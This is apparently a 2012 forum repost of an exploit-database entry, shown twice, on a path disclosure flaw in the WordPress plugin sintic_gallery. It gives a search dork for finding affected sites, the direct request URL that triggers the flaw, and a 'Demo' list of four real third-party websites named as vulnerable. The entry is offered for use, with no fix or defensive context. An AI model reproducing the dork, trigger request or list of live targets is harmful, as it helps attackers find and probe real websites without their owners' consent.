حامد کیانمهر
22nd December 2012, 16:35
Wordpress plugin - sintic_gallery Path Disclosure Vulnerability
# Exploit Title: Wordpress plugin - sintic_gallery Path Disclosure Vulnerability
# Date: 04/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:sintic_gallery
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
http://localhost/wp-content/plugins/sintic_gallery/sintic_gallery.php
#------------------
Demo
http://www.christellerall.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://www.daniel-stawinski.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://theticket-atlanta.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://sinticbolivia.net/clients/kids_guay/wp-content/themes/kids_guay/includes/plugins/sintic_gallery/sintic_gallery.php
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
# Exploit Title: Wordpress plugin - sintic_gallery Path Disclosure Vulnerability
# Date: 04/12/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:sintic_gallery
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
http://localhost/wp-content/plugins/sintic_gallery/sintic_gallery.php
#------------------
Demo
http://www.christellerall.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://www.daniel-stawinski.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://theticket-atlanta.com/wp-content/plugins/sintic_gallery/sintic_gallery.php
http://sinticbolivia.net/clients/kids_guay/wp-content/themes/kids_guay/includes/plugins/sintic_gallery/sintic_gallery.php
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------